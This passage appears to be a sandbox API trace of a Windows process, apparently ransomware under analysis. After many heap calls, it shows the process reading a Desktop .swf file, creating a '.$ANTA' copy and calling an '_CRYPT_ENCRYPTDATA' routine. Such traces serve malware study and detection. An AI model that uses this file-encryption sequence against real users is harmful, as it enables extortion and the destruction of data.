lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0134.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.575] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0134.575] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0134.575] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0134.575] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0134.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0134.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0134.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\mjt96umrmqqhf.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0134.576] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.576] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.576] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0134.576] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0134.576] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0134.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0134.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0134.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a40c8 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0134.578] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0134.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0134.579] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\mjt96umrmqqhf.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.579] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0134.580] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0134.580] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0134.580] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0134.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0134.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0134.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b89020 [0134.583] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0134.583] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0134.585] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x35da, lpOverlapped=0x0) returned 1 [0134.586] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0134.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0134.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135da) returned 0x49aa010 [0134.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b89020 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135da) returned 0x49bd5f8 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.589] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135da) returned 0x49aa010 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.589] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0134.589] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0134.590] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0134.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0134.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 